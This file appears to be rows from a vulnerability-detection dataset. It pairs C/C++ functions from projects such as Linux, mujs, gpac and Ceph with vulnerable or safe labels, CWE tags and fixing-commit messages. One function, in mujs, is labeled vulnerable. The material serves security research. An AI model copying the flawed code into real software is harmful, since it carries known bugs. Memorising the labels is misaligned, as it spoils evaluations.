func (string, length 0 to 484k) | target (int64, 0 to 1) | cwe (list, length 0 to 4) | project (string, 799 classes) | commit_id (string, length 40) | hash (float64, ~1.2e24 to ~3.4e38) | size (int64, 1 to 24k) | message (string, length 0 to 13.3k) |
---|---|---|---|---|---|---|---|
static inline unsigned long group_faults_cpu(struct numa_group *group, int nid)
{
return group->faults_cpu[task_faults_idx(NUMA_MEM, nid, 0)] +
group->faults_cpu[task_faults_idx(NUMA_MEM, nid, 1)];
}
| 0 |
[
"CWE-400",
"CWE-703",
"CWE-835"
] |
linux
|
c40f7d74c741a907cfaeb73a7697081881c497d0
| 14,342,586,438,121,807,000,000,000,000,000,000,000 | 5 |
sched/fair: Fix infinite loop in update_blocked_averages() by reverting a9e7f6544b9c
Zhipeng Xie, Xie XiuQi and Sargun Dhillon reported lockups in the
scheduler under high loads, starting at around the v4.18 time frame,
and Zhipeng Xie tracked it down to bugs in the rq->leaf_cfs_rq_list
manipulation.
Do a (manual) revert of:
a9e7f6544b9c ("sched/fair: Fix O(nr_cgroups) in load balance path")
It turns out that the list_del_leaf_cfs_rq() introduced by this commit
has a surprising property that was not considered in followup commits
such as:
9c2791f936ef ("sched/fair: Fix hierarchical order in rq->leaf_cfs_rq_list")
As Vincent Guittot explains:
"I think that there is a bigger problem with commit a9e7f6544b9c and
cfs_rq throttling:
Let take the example of the following topology TG2 --> TG1 --> root:
1) The 1st time a task is enqueued, we will add TG2 cfs_rq then TG1
cfs_rq to leaf_cfs_rq_list and we are sure to do the whole branch in
one path because it has never been used and can't be throttled so
tmp_alone_branch will point to leaf_cfs_rq_list at the end.
2) Then TG1 is throttled
3) and we add TG3 as a new child of TG1.
4) The 1st enqueue of a task on TG3 will add TG3 cfs_rq just before TG1
cfs_rq and tmp_alone_branch will stay on rq->leaf_cfs_rq_list.
With commit a9e7f6544b9c, we can del a cfs_rq from rq->leaf_cfs_rq_list.
So if the load of TG1 cfs_rq becomes NULL before step 2) above, TG1
cfs_rq is removed from the list.
Then at step 4), TG3 cfs_rq is added at the beginning of rq->leaf_cfs_rq_list
but tmp_alone_branch still points to TG3 cfs_rq because its throttled
parent can't be enqueued when the lock is released.
tmp_alone_branch doesn't point to rq->leaf_cfs_rq_list whereas it should.
So if TG3 cfs_rq is removed or destroyed before tmp_alone_branch
points on another TG cfs_rq, the next TG cfs_rq that will be added,
will be linked outside rq->leaf_cfs_rq_list - which is bad.
In addition, we can break the ordering of the cfs_rq in
rq->leaf_cfs_rq_list but this ordering is used to update and
propagate the update from leaf down to root."
Instead of trying to work through all these cases and trying to reproduce
the very high loads that produced the lockup to begin with, simplify
the code temporarily by reverting a9e7f6544b9c - which change was clearly
not thought through completely.
This (hopefully) gives us a kernel that doesn't lock up so people
can continue to enjoy their holidays without worrying about regressions. ;-)
[ mingo: Wrote changelog, fixed weird spelling in code comment while at it. ]
Analyzed-by: Xie XiuQi <[email protected]>
Analyzed-by: Vincent Guittot <[email protected]>
Reported-by: Zhipeng Xie <[email protected]>
Reported-by: Sargun Dhillon <[email protected]>
Reported-by: Xie XiuQi <[email protected]>
Tested-by: Zhipeng Xie <[email protected]>
Tested-by: Sargun Dhillon <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
Acked-by: Vincent Guittot <[email protected]>
Cc: <[email protected]> # v4.13+
Cc: Bin Li <[email protected]>
Cc: Mike Galbraith <[email protected]>
Cc: Peter Zijlstra <[email protected]>
Cc: Tejun Heo <[email protected]>
Cc: Thomas Gleixner <[email protected]>
Fixes: a9e7f6544b9c ("sched/fair: Fix O(nr_cgroups) in load balance path")
Link: http://lkml.kernel.org/r/[email protected]
Signed-off-by: Ingo Molnar <[email protected]>
|
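The failure mode Vincent Guittot describes above boils down to keeping a raw cursor (tmp_alone_branch) into a linked list while other code is allowed to unlink the node it points at. The plain C sketch below illustrates only that generic pattern; the list layout and helper names are made up and are not the kernel's cfs_rq code.

```c
#include <stdio.h>
#include <stdlib.h>

struct node { int id; struct node *next; };

static struct node *head;    /* stands in for rq->leaf_cfs_rq_list */
static struct node *cursor;  /* stands in for tmp_alone_branch     */

static struct node *push(int id)
{
    struct node *n = malloc(sizeof(*n));
    n->id = id;
    n->next = head;
    head = n;
    return n;
}

/* Unlink and free a node without telling anyone who cached a pointer to it. */
static void unlink_node(struct node *victim)
{
    struct node **pp = &head;
    while (*pp && *pp != victim)
        pp = &(*pp)->next;
    if (*pp) {
        *pp = victim->next;
        free(victim);
    }
}

int main(void)
{
    push(1);              /* TG1 */
    cursor = push(3);     /* TG3: the cursor marks where the branch continues */
    unlink_node(cursor);  /* the analogue of list_del_leaf_cfs_rq() */
    /* From here on, any insertion routed through 'cursor' links new nodes
     * through freed memory, i.e. outside the list, which is the class of
     * bug the revert removes. */
    puts("cursor now refers to freed memory");
    return 0;
}
```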
asmlinkage void do_notify_resume(struct pt_regs *regs, unsigned long thread_info_flags)
{
if (thread_info_flags & _TIF_SIGPENDING)
do_signal(regs, 0);
if (thread_info_flags & _TIF_NOTIFY_RESUME) {
clear_thread_flag(TIF_NOTIFY_RESUME);
tracehook_notify_resume(regs);
if (current->replacement_session_keyring)
key_replace_session_keyring();
}
}
| 0 |
[] |
linux-2.6
|
ee18d64c1f632043a02e6f5ba5e045bb26a5465f
| 82,106,669,616,644,270,000,000,000,000,000,000,000 | 12 |
KEYS: Add a keyctl to install a process's session keyring on its parent [try #6]
Add a keyctl to install a process's session keyring onto its parent. This
replaces the parent's session keyring. Because the COW credential code does
not permit one process to change another process's credentials directly, the
change is deferred until userspace next starts executing again. Normally this
will be after a wait*() syscall.
To support this, three new security hooks have been provided:
cred_alloc_blank() to allocate unset security creds, cred_transfer() to fill in
the blank security creds and key_session_to_parent() - which asks the LSM if
the process may replace its parent's session keyring.
The replacement may only happen if the process has the same ownership details
as its parent, and the process has LINK permission on the session keyring, and
the session keyring is owned by the process, and the LSM permits it.
Note that this requires alteration to each architecture's notify_resume path.
This has been done for all arches barring blackfin, m68k* and xtensa, all of
which need assembly alteration to support TIF_NOTIFY_RESUME. This allows the
replacement to be performed at the point the parent process resumes userspace
execution.
This allows the userspace AFS pioctl emulation to fully emulate newpag() and
the VIOCSETTOK and VIOCSETTOK2 pioctls, all of which require the ability to
alter the parent process's PAG membership. However, since kAFS doesn't use
PAGs per se, but rather dumps the keys into the session keyring, the session
keyring of the parent must be replaced if, for example, VIOCSETTOK is passed
the newpag flag.
This can be tested with the following program:
#include <stdio.h>
#include <stdlib.h>
#include <keyutils.h>
#define KEYCTL_SESSION_TO_PARENT 18
#define OSERROR(X, S) do { if ((long)(X) == -1) { perror(S); exit(1); } } while(0)
int main(int argc, char **argv)
{
key_serial_t keyring, key;
long ret;
keyring = keyctl_join_session_keyring(argv[1]);
OSERROR(keyring, "keyctl_join_session_keyring");
key = add_key("user", "a", "b", 1, keyring);
OSERROR(key, "add_key");
ret = keyctl(KEYCTL_SESSION_TO_PARENT);
OSERROR(ret, "KEYCTL_SESSION_TO_PARENT");
return 0;
}
Compiled and linked with -lkeyutils, you should see something like:
[dhowells@andromeda ~]$ keyctl show
Session Keyring
-3 --alswrv 4043 4043 keyring: _ses
355907932 --alswrv 4043 -1 \_ keyring: _uid.4043
[dhowells@andromeda ~]$ /tmp/newpag
[dhowells@andromeda ~]$ keyctl show
Session Keyring
-3 --alswrv 4043 4043 keyring: _ses
1055658746 --alswrv 4043 4043 \_ user: a
[dhowells@andromeda ~]$ /tmp/newpag hello
[dhowells@andromeda ~]$ keyctl show
Session Keyring
-3 --alswrv 4043 4043 keyring: hello
340417692 --alswrv 4043 4043 \_ user: a
Where the test program creates a new session keyring, sticks a user key named
'a' into it and then installs it on its parent.
Signed-off-by: David Howells <[email protected]>
Signed-off-by: James Morris <[email protected]>
|
GF_Err saiz_Write(GF_Box *s, GF_BitStream *bs)
{
GF_Err e;
GF_SampleAuxiliaryInfoSizeBox*ptr = (GF_SampleAuxiliaryInfoSizeBox*) s;
if (!s) return GF_BAD_PARAM;
e = gf_isom_full_box_write(s, bs);
if (e) return e;
if (ptr->flags & 1) {
gf_bs_write_u32(bs, ptr->aux_info_type);
gf_bs_write_u32(bs, ptr->aux_info_type_parameter);
}
gf_bs_write_u8(bs, ptr->default_sample_info_size);
gf_bs_write_u32(bs, ptr->sample_count);
if (!ptr->default_sample_info_size) {
gf_bs_write_data(bs, (char *) ptr->sample_info_size, ptr->sample_count);
}
return GF_OK;
}
| 0 |
[
"CWE-400",
"CWE-401"
] |
gpac
|
d2371b4b204f0a3c0af51ad4e9b491144dd1225c
| 218,673,900,211,110,350,000,000,000,000,000,000,000 | 19 |
prevent dref memleak on invalid input (#1183)
|
static void labeljumps(JF, js_JumpList *jump, int baddr, int caddr)
{
while (jump) {
if (jump->type == STM_BREAK)
labelto(J, F, jump->inst, baddr);
if (jump->type == STM_CONTINUE)
labelto(J, F, jump->inst, caddr);
jump = jump->next;
}
}
| 1 |
[
"CWE-703",
"CWE-787"
] |
mujs
|
df8559e7bdbc6065276e786217eeee70f28fce66
| 35,025,489,215,643,323,000,000,000,000,000,000,000 | 10 |
Bug 704749: Clear jump list after patching jump addresses.
Since we can emit a statement multiple times when compiling try/finally
we have to use a new patch list for each instance.
|
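The mujs fix amounts to making the jump-patching pass consume its list, so that a statement emitted a second time (as happens when compiling try/finally) starts from an empty patch list. A minimal sketch of that idea in plain C, with illustrative types rather than mujs's actual js_JumpList handling:

```c
#include <stdlib.h>

enum jump_type { STM_BREAK, STM_CONTINUE };

struct jump_entry {
    enum jump_type type;
    int inst;                    /* address of the placeholder jump */
    struct jump_entry *next;
};

static int code[256];            /* pretend code buffer */

static void patch(int inst, int addr) { code[inst] = addr; }

/* Patch every pending jump, then free the entries and reset the head, so a
 * second emission of the same statement starts from an empty list. */
static void label_jumps(struct jump_entry **head, int break_addr, int cont_addr)
{
    struct jump_entry *j = *head;
    while (j) {
        struct jump_entry *next = j->next;
        patch(j->inst, j->type == STM_BREAK ? break_addr : cont_addr);
        free(j);
        j = next;
    }
    *head = NULL;                /* the part the fix adds: no stale entries */
}
```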
static int __init calipso_cache_init(void)
{
u32 iter;
calipso_cache = kcalloc(CALIPSO_CACHE_BUCKETS,
sizeof(struct calipso_map_cache_bkt),
GFP_KERNEL);
if (!calipso_cache)
return -ENOMEM;
for (iter = 0; iter < CALIPSO_CACHE_BUCKETS; iter++) {
spin_lock_init(&calipso_cache[iter].lock);
calipso_cache[iter].size = 0;
INIT_LIST_HEAD(&calipso_cache[iter].list);
}
return 0;
}
| 0 |
[
"CWE-416"
] |
linux
|
ad5d07f4a9cd671233ae20983848874731102c08
| 171,955,502,553,684,130,000,000,000,000,000,000,000 | 18 |
cipso,calipso: resolve a number of problems with the DOI refcounts
The current CIPSO and CALIPSO refcounting scheme for the DOI
definitions is a bit flawed in that we:
1. Don't correctly match gets/puts in netlbl_cipsov4_list().
2. Decrement the refcount on each attempt to remove the DOI from the
DOI list, only removing it from the list once the refcount drops
to zero.
This patch fixes these problems by adding the missing "puts" to
netlbl_cipsov4_list() and introduces a more conventional, i.e.
not-buggy, refcounting mechanism to the DOI definitions. Upon the
addition of a DOI to the DOI list, it is initialized with a refcount
of one, removing a DOI from the list removes it from the list and
drops the refcount by one; "gets" and "puts" behave as expected with
respect to refcounts, increasing and decreasing the DOI's refcount by
one.
Fixes: b1edeb102397 ("netlabel: Replace protocol/NetLabel linking with refrerence counts")
Fixes: d7cce01504a0 ("netlabel: Add support for removing a CALIPSO DOI.")
Reported-by: [email protected]
Signed-off-by: Paul Moore <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
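The refcounting convention the commit message describes (insertion into the DOI list initializes the count to one, removal drops exactly that reference, and gets/puts bracket every other use) can be sketched in a few lines of plain C. The doi_def type and helpers below are stand-ins, not the actual NetLabel structures:

```c
#include <stdlib.h>

struct doi_def {
    int refcount;                /* the real code would use refcount_t */
    struct doi_def *next;
};

static struct doi_def *doi_list;

/* Adding to the list hands the list its own reference: count starts at 1. */
static void doi_add(struct doi_def *doi)
{
    doi->refcount = 1;
    doi->next = doi_list;
    doi_list = doi;
}

static void doi_get(struct doi_def *doi) { doi->refcount++; }

static void doi_put(struct doi_def *doi)
{
    if (--doi->refcount == 0)
        free(doi);
}

/* Removal unlinks exactly once and drops only the list's reference; callers
 * that still hold a get() keep the object alive until their own put(). */
static void doi_remove(struct doi_def *doi)
{
    struct doi_def **pp = &doi_list;
    while (*pp && *pp != doi)
        pp = &(*pp)->next;
    if (*pp) {
        *pp = doi->next;
        doi_put(doi);
    }
}
```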
int sc_mem_reverse(unsigned char *buf, size_t len)
{
unsigned char ch;
size_t ii;
if (!buf || !len)
return SC_ERROR_INVALID_ARGUMENTS;
for (ii = 0; ii < len / 2; ii++) {
ch = *(buf + ii);
*(buf + ii) = *(buf + len - 1 - ii);
*(buf + len - 1 - ii) = ch;
}
return SC_SUCCESS;
}
| 0 |
[
"CWE-415",
"CWE-119"
] |
OpenSC
|
360e95d45ac4123255a4c796db96337f332160ad
| 132,055,422,843,079,060,000,000,000,000,000,000,000 | 16 |
fixed out of bounds writes
Thanks to Eric Sesterhenn from X41 D-SEC GmbH
for reporting the problems.
|
static struct udf_bitmap *udf_sb_alloc_bitmap(struct super_block *sb, u32 index)
{
struct udf_bitmap *bitmap;
int nr_groups;
int size;
nr_groups = udf_compute_nr_groups(sb, index);
size = sizeof(struct udf_bitmap) +
(sizeof(struct buffer_head *) * nr_groups);
if (size <= PAGE_SIZE)
bitmap = kzalloc(size, GFP_KERNEL);
else
bitmap = vzalloc(size); /* TODO: get rid of vzalloc */
if (bitmap == NULL)
return NULL;
bitmap->s_block_bitmap = (struct buffer_head **)(bitmap + 1);
bitmap->s_nr_groups = nr_groups;
return bitmap;
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
linux
|
1df2ae31c724e57be9d7ac00d78db8a5dabdd050
| 168,581,320,854,450,590,000,000,000,000,000,000,000 | 22 |
udf: Fortify loading of sparing table
Add sanity checks when loading sparing table from disk to avoid accessing
unallocated memory or writing to it.
Signed-off-by: Jan Kara <[email protected]>
|
//! Load image using GraphicsMagick's external tool 'gm' \newinstance.
static CImg<T> get_load_graphicsmagick_external(const char *const filename) {
return CImg<T>().load_graphicsmagick_external(filename);
}
| 0 |
[
"CWE-125"
] |
CImg
|
10af1e8c1ad2a58a0a3342a856bae63e8f257abb
| 17,650,912,859,412,271,000,000,000,000,000,000,000 | 3 |
Fix other issues in 'CImg<T>::load_bmp()'.
|
Field_decimal::reset(void)
{
Field_decimal::store(STRING_WITH_LEN("0"),&my_charset_bin);
return 0;
}
| 0 |
[
"CWE-416",
"CWE-703"
] |
server
|
08c7ab404f69d9c4ca6ca7a9cf7eec74c804f917
| 26,987,630,508,805,580,000,000,000,000,000,000,000 | 5 |
MDEV-24176 Server crashes after insert in the table with virtual
column generated using date_format() and if()
vcol_info->expr is allocated on expr_arena at parsing stage. Since
expr item is allocated on expr_arena all its containee items must be
allocated on expr_arena too. Otherwise fix_session_expr() will
encounter prematurely freed item.
When table is reopened from cache vcol_info contains stale
expression. We refresh expression via TABLE::vcol_fix_exprs() but
first we must prepare a proper context (Vcol_expr_context) which meets
some requirements:
1. As noted above expr update must be done on expr_arena as there may
be new items created. It was a bug in fix_session_expr_for_read() and
was just not reproduced because of no second refix. Now refix is done
for more cases so it does reproduce. Tests affected: vcol.binlog
2. Also name resolution context must be narrowed to the single table.
Tested by: vcol.update main.default vcol.vcol_syntax gcol.gcol_bugfixes
3. sql_mode must be clean and not fail expr update.
sql_mode such as MODE_NO_BACKSLASH_ESCAPES, MODE_NO_ZERO_IN_DATE, etc
must not affect vcol expression update. If the table was created
successfully any further evaluation must not fail. Tests affected:
main.func_like
Reviewed by: Sergei Golubchik <[email protected]>
|
void LibRaw::phase_one_subtract_black(ushort *src, ushort *dest)
{
// ushort *src = (ushort*)imgdata.rawdata.raw_alloc;
if(O.user_black<0 && O.user_cblack[0] <= -1000000 && O.user_cblack[1] <= -1000000 && O.user_cblack[2] <= -1000000 && O.user_cblack[3] <= -1000000)
{
for(int row = 0; row < S.raw_height; row++)
{
ushort bl = imgdata.color.phase_one_data.t_black - imgdata.rawdata.ph1_black[row][0];
for(int col=0; col < imgdata.color.phase_one_data.split_col && col < S.raw_width; col++)
{
int idx = row*S.raw_width + col;
ushort val = src[idx];
dest[idx] = val>bl?val-bl:0;
}
bl = imgdata.color.phase_one_data.t_black - imgdata.rawdata.ph1_black[row][1];
for(int col=imgdata.color.phase_one_data.split_col; col < S.raw_width; col++)
{
int idx = row*S.raw_width + col;
ushort val = src[idx];
dest[idx] = val>bl?val-bl:0;
}
}
}
else // black set by user interaction
{
// Black level in cblack!
for(int row = 0; row < S.raw_height; row++)
{
unsigned short cblk[16];
for(int cc=0; cc<16;cc++)
cblk[cc]=C.cblack[fcol(row,cc)];
for(int col = 0; col < S.raw_width; col++)
{
int idx = row*S.raw_width + col;
ushort val = src[idx];
ushort bl = cblk[col&0xf];
dest[idx] = val>bl?val-bl:0;
}
}
}
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
LibRaw
|
2f912f5b33582961b1cdbd9fd828589f8b78f21d
| 137,228,394,083,199,800,000,000,000,000,000,000,000 | 41 |
fixed wrong data_maximum calculation; prevent out-of-buffer in exp_bef
|
void btrfs_inherit_iflags(struct inode *inode, struct inode *dir)
{
unsigned int flags;
if (!dir)
return;
flags = BTRFS_I(dir)->flags;
if (flags & BTRFS_INODE_NOCOMPRESS) {
BTRFS_I(inode)->flags &= ~BTRFS_INODE_COMPRESS;
BTRFS_I(inode)->flags |= BTRFS_INODE_NOCOMPRESS;
} else if (flags & BTRFS_INODE_COMPRESS) {
BTRFS_I(inode)->flags &= ~BTRFS_INODE_NOCOMPRESS;
BTRFS_I(inode)->flags |= BTRFS_INODE_COMPRESS;
}
if (flags & BTRFS_INODE_NODATACOW) {
BTRFS_I(inode)->flags |= BTRFS_INODE_NODATACOW;
if (S_ISREG(inode->i_mode))
BTRFS_I(inode)->flags |= BTRFS_INODE_NODATASUM;
}
btrfs_update_iflags(inode);
}
| 0 |
[
"CWE-200"
] |
linux
|
8039d87d9e473aeb740d4fdbd59b9d2f89b2ced9
| 49,507,311,139,274,540,000,000,000,000,000,000,000 | 25 |
Btrfs: fix file corruption and data loss after cloning inline extents
Currently the clone ioctl allows to clone an inline extent from one file
to another that already has other (non-inlined) extents. This is a problem
because btrfs is not designed to deal with files having inline and regular
extents, if a file has an inline extent then it must be the only extent
in the file and must start at file offset 0. Having a file with an inline
extent followed by regular extents results in EIO errors when doing reads
or writes against the first 4K of the file.
Also, the clone ioctl allows one to lose data if the source file consists
of a single inline extent, with a size of N bytes, and the destination
file consists of a single inline extent with a size of M bytes, where we
have M > N. In this case the clone operation removes the inline extent
from the destination file and then copies the inline extent from the
source file into the destination file - we lose the M - N bytes from the
destination file, a read operation will get the value 0x00 for any bytes
in the range [N, M] (the destination inode's i_size remained as M,
that's why we can read past N bytes).
So fix this by not allowing such destructive operations to happen and
return errno EOPNOTSUPP to user space.
Currently the fstest btrfs/035 tests the data loss case but it totally
ignores this - i.e. expects the operation to succeed and does not check
that we got data loss.
The following test case for fstests exercises all these cases that result
in file corruption and data loss:
seq=`basename $0`
seqres=$RESULT_DIR/$seq
echo "QA output created by $seq"
tmp=/tmp/$$
status=1 # failure is the default!
trap "_cleanup; exit \$status" 0 1 2 3 15
_cleanup()
{
rm -f $tmp.*
}
# get standard environment, filters and checks
. ./common/rc
. ./common/filter
# real QA test starts here
_need_to_be_root
_supported_fs btrfs
_supported_os Linux
_require_scratch
_require_cloner
_require_btrfs_fs_feature "no_holes"
_require_btrfs_mkfs_feature "no-holes"
rm -f $seqres.full
test_cloning_inline_extents()
{
local mkfs_opts=$1
local mount_opts=$2
_scratch_mkfs $mkfs_opts >>$seqres.full 2>&1
_scratch_mount $mount_opts
# File bar, the source for all the following clone operations, consists
# of a single inline extent (50 bytes).
$XFS_IO_PROG -f -c "pwrite -S 0xbb 0 50" $SCRATCH_MNT/bar \
| _filter_xfs_io
# Test cloning into a file with an extent (non-inlined) where the
# destination offset overlaps that extent. It should not be possible to
# clone the inline extent from file bar into this file.
$XFS_IO_PROG -f -c "pwrite -S 0xaa 0K 16K" $SCRATCH_MNT/foo \
| _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo
# Doing IO against any range in the first 4K of the file should work.
# Due to a past clone ioctl bug which allowed cloning the inline extent,
# these operations resulted in EIO errors.
echo "File foo data after clone operation:"
# All bytes should have the value 0xaa (clone operation failed and did
# not modify our file).
od -t x1 $SCRATCH_MNT/foo
$XFS_IO_PROG -c "pwrite -S 0xcc 0 100" $SCRATCH_MNT/foo | _filter_xfs_io
# Test cloning the inline extent against a file which has a hole in its
# first 4K followed by a non-inlined extent. It should not be possible
# as well to clone the inline extent from file bar into this file.
$XFS_IO_PROG -f -c "pwrite -S 0xdd 4K 12K" $SCRATCH_MNT/foo2 \
| _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo2
# Doing IO against any range in the first 4K of the file should work.
# Due to a past clone ioctl bug which allowed cloning the inline extent,
# these operations resulted in EIO errors.
echo "File foo2 data after clone operation:"
# All bytes should have the value 0x00 (clone operation failed and did
# not modify our file).
od -t x1 $SCRATCH_MNT/foo2
$XFS_IO_PROG -c "pwrite -S 0xee 0 90" $SCRATCH_MNT/foo2 | _filter_xfs_io
# Test cloning the inline extent against a file which has a size of zero
# but has a prealloc extent. It should not be possible as well to clone
# the inline extent from file bar into this file.
$XFS_IO_PROG -f -c "falloc -k 0 1M" $SCRATCH_MNT/foo3 | _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo3
# Doing IO against any range in the first 4K of the file should work.
# Due to a past clone ioctl bug which allowed cloning the inline extent,
# these operations resulted in EIO errors.
echo "First 50 bytes of foo3 after clone operation:"
# Should not be able to read any bytes, file has 0 bytes i_size (the
# clone operation failed and did not modify our file).
od -t x1 $SCRATCH_MNT/foo3
$XFS_IO_PROG -c "pwrite -S 0xff 0 90" $SCRATCH_MNT/foo3 | _filter_xfs_io
# Test cloning the inline extent against a file which consists of a
# single inline extent that has a size not greater than the size of
# bar's inline extent (40 < 50).
# It should be possible to do the extent cloning from bar to this file.
$XFS_IO_PROG -f -c "pwrite -S 0x01 0 40" $SCRATCH_MNT/foo4 \
| _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo4
# Doing IO against any range in the first 4K of the file should work.
echo "File foo4 data after clone operation:"
# Must match file bar's content.
od -t x1 $SCRATCH_MNT/foo4
$XFS_IO_PROG -c "pwrite -S 0x02 0 90" $SCRATCH_MNT/foo4 | _filter_xfs_io
# Test cloning the inline extent against a file which consists of a
# single inline extent that has a size greater than the size of bar's
# inline extent (60 > 50).
# It should not be possible to clone the inline extent from file bar
# into this file.
$XFS_IO_PROG -f -c "pwrite -S 0x03 0 60" $SCRATCH_MNT/foo5 \
| _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo5
# Reading the file should not fail.
echo "File foo5 data after clone operation:"
# Must have a size of 60 bytes, with all bytes having a value of 0x03
# (the clone operation failed and did not modify our file).
od -t x1 $SCRATCH_MNT/foo5
# Test cloning the inline extent against a file which has no extents but
# has a size greater than bar's inline extent (16K > 50).
# It should not be possible to clone the inline extent from file bar
# into this file.
$XFS_IO_PROG -f -c "truncate 16K" $SCRATCH_MNT/foo6 | _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo6
# Reading the file should not fail.
echo "File foo6 data after clone operation:"
# Must have a size of 16K, with all bytes having a value of 0x00 (the
# clone operation failed and did not modify our file).
od -t x1 $SCRATCH_MNT/foo6
# Test cloning the inline extent against a file which has no extents but
# has a size not greater than bar's inline extent (30 < 50).
# It should be possible to clone the inline extent from file bar into
# this file.
$XFS_IO_PROG -f -c "truncate 30" $SCRATCH_MNT/foo7 | _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo7
# Reading the file should not fail.
echo "File foo7 data after clone operation:"
# Must have a size of 50 bytes, with all bytes having a value of 0xbb.
od -t x1 $SCRATCH_MNT/foo7
# Test cloning the inline extent against a file which has a size not
# greater than the size of bar's inline extent (20 < 50) but has
# a prealloc extent that goes beyond the file's size. It should not be
# possible to clone the inline extent from bar into this file.
$XFS_IO_PROG -f -c "falloc -k 0 1M" \
-c "pwrite -S 0x88 0 20" \
$SCRATCH_MNT/foo8 | _filter_xfs_io
$CLONER_PROG -s 0 -d 0 -l 0 $SCRATCH_MNT/bar $SCRATCH_MNT/foo8
echo "File foo8 data after clone operation:"
# Must have a size of 20 bytes, with all bytes having a value of 0x88
# (the clone operation did not modify our file).
od -t x1 $SCRATCH_MNT/foo8
_scratch_unmount
}
echo -e "\nTesting without compression and without the no-holes feature...\n"
test_cloning_inline_extents
echo -e "\nTesting with compression and without the no-holes feature...\n"
test_cloning_inline_extents "" "-o compress"
echo -e "\nTesting without compression and with the no-holes feature...\n"
test_cloning_inline_extents "-O no-holes" ""
echo -e "\nTesting with compression and with the no-holes feature...\n"
test_cloning_inline_extents "-O no-holes" "-o compress"
status=0
exit
Cc: [email protected]
Signed-off-by: Filipe Manana <[email protected]>
|
TEST_P(MessengerTest, StatefulTest) {
Message *m;
FakeDispatcher cli_dispatcher(false), srv_dispatcher(true);
entity_addr_t bind_addr;
bind_addr.parse("127.0.0.1");
Messenger::Policy p = Messenger::Policy::stateful_server(0);
server_msgr->set_policy(entity_name_t::TYPE_CLIENT, p);
p = Messenger::Policy::lossless_client(0);
client_msgr->set_policy(entity_name_t::TYPE_OSD, p);
server_msgr->bind(bind_addr);
server_msgr->add_dispatcher_head(&srv_dispatcher);
server_msgr->start();
client_msgr->add_dispatcher_head(&cli_dispatcher);
client_msgr->start();
// 1. test for server standby
ConnectionRef conn = client_msgr->get_connection(server_msgr->get_myinst());
{
m = new MPing();
ASSERT_EQ(conn->send_message(m), 0);
Mutex::Locker l(cli_dispatcher.lock);
while (!cli_dispatcher.got_new)
cli_dispatcher.cond.Wait(cli_dispatcher.lock);
cli_dispatcher.got_new = false;
}
ASSERT_TRUE(static_cast<Session*>(conn->get_priv())->get_count() == 1);
conn->mark_down();
ASSERT_FALSE(conn->is_connected());
ConnectionRef server_conn = server_msgr->get_connection(client_msgr->get_myinst());
// don't lose state
ASSERT_TRUE(static_cast<Session*>(server_conn->get_priv())->get_count() == 1);
srv_dispatcher.got_new = false;
conn = client_msgr->get_connection(server_msgr->get_myinst());
{
m = new MPing();
ASSERT_EQ(conn->send_message(m), 0);
Mutex::Locker l(cli_dispatcher.lock);
while (!cli_dispatcher.got_new)
cli_dispatcher.cond.Wait(cli_dispatcher.lock);
cli_dispatcher.got_new = false;
}
ASSERT_TRUE(static_cast<Session*>(conn->get_priv())->get_count() == 1);
server_conn = server_msgr->get_connection(client_msgr->get_myinst());
{
Mutex::Locker l(srv_dispatcher.lock);
while (!srv_dispatcher.got_remote_reset)
srv_dispatcher.cond.Wait(srv_dispatcher.lock);
}
// 2. test for client reconnect
ASSERT_FALSE(cli_dispatcher.got_remote_reset);
cli_dispatcher.got_connect = false;
cli_dispatcher.got_new = false;
cli_dispatcher.got_remote_reset = false;
server_conn->mark_down();
ASSERT_FALSE(server_conn->is_connected());
// ensure client detect server socket closed
{
Mutex::Locker l(cli_dispatcher.lock);
while (!cli_dispatcher.got_remote_reset)
cli_dispatcher.cond.Wait(cli_dispatcher.lock);
cli_dispatcher.got_remote_reset = false;
}
{
Mutex::Locker l(cli_dispatcher.lock);
while (!cli_dispatcher.got_connect)
cli_dispatcher.cond.Wait(cli_dispatcher.lock);
cli_dispatcher.got_connect = false;
}
CHECK_AND_WAIT_TRUE(conn->is_connected());
ASSERT_TRUE(conn->is_connected());
{
m = new MPing();
ASSERT_EQ(conn->send_message(m), 0);
ASSERT_TRUE(conn->is_connected());
Mutex::Locker l(cli_dispatcher.lock);
while (!cli_dispatcher.got_new)
cli_dispatcher.cond.Wait(cli_dispatcher.lock);
cli_dispatcher.got_new = false;
}
// resetcheck happen
ASSERT_EQ(1U, static_cast<Session*>(conn->get_priv())->get_count());
server_conn = server_msgr->get_connection(client_msgr->get_myinst());
ASSERT_EQ(1U, static_cast<Session*>(server_conn->get_priv())->get_count());
cli_dispatcher.got_remote_reset = false;
server_msgr->shutdown();
client_msgr->shutdown();
server_msgr->wait();
client_msgr->wait();
}
| 0 |
[
"CWE-287",
"CWE-284"
] |
ceph
|
5ead97120e07054d80623dada90a5cc764c28468
| 20,063,317,078,663,555,000,000,000,000,000,000,000 | 94 |
auth/cephx: add authorizer challenge
Allow the accepting side of a connection to reject an initial authorizer
with a random challenge. The connecting side then has to respond with an
updated authorizer proving they are able to decrypt the service's challenge
and that the new authorizer was produced for this specific connection
instance.
The accepting side requires this challenge and response unconditionally
if the client side advertises they have the feature bit. Servers wishing
to require this improved level of authentication simply have to require
the appropriate feature.
Signed-off-by: Sage Weil <[email protected]>
(cherry picked from commit f80b848d3f830eb6dba50123e04385173fa4540b)
# Conflicts:
# src/auth/Auth.h
# src/auth/cephx/CephxProtocol.cc
# src/auth/cephx/CephxProtocol.h
# src/auth/none/AuthNoneProtocol.h
# src/msg/Dispatcher.h
# src/msg/async/AsyncConnection.cc
- const_iterator
- ::decode vs decode
- AsyncConnection ctor arg noise
- get_random_bytes(), not cct->random()
|
